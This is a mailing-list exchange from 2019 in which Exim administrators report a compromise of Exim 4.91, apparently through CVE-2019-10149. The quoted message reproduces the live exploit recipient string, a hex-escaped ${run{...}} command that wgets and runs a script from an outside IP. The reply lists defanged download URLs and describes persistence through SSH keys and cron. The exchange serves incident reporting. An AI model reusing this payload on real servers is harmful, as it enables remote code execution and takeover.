Hi Calum, Similarly, one of my honeypot VMs running exposed Exim 4.91 has been attacked yesterday by similar means. The attacker, in my case, tried to download and execute one of the below (I excluded scheme prefix from links):
an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm an7kmd2wp4xo7hpr dot tor2web dot io/src/ldm an7kmd2wp4xo7hpr dot onion dot sh/src/ldm The script (ldm) itself is quite non-professional and buggy - the VM wasn't available via SSH, thus the attack only resulted in copying RSA key of would-be hacker to root' authorized keys and inserting cron tasks to re-attempt the above. I don't know where to report such things. To malware/antivirus manufacturers, perhaps? But the proper question is, IMHO, "why I haven't hardened my Exim installations while I could". Sincerely, Konstantin Calum Mackay via Exim-users писал 2019-06-11 07:10: > hi all, > > My mail system has just been hacked; it's running Debian unstable exim > 4.91-9 > > Could it be CVE-2019-10149? I don't see any reports of active exploits > yet. > > The reasons I suspect exim involvement: > > • starting today, every 5 mins getting frozen messages: > > The following address(es) have yet to be delivered: > > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx: > Too many "Received" headers - suspected mail loop > > • the trojan horse scripts, that were successfully installed on my > system, with root access, are all group Debian-exim > > > Luckily, it looks like the trojans did nothing more than repeated > attempts to open up my ssh server to root logins, which I think (and > hope) didn't actually work, so I may have been lucky, and the damage > isn't widespread. > > > ought I to be reporting this anywhere? > > > thanks, > calum. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/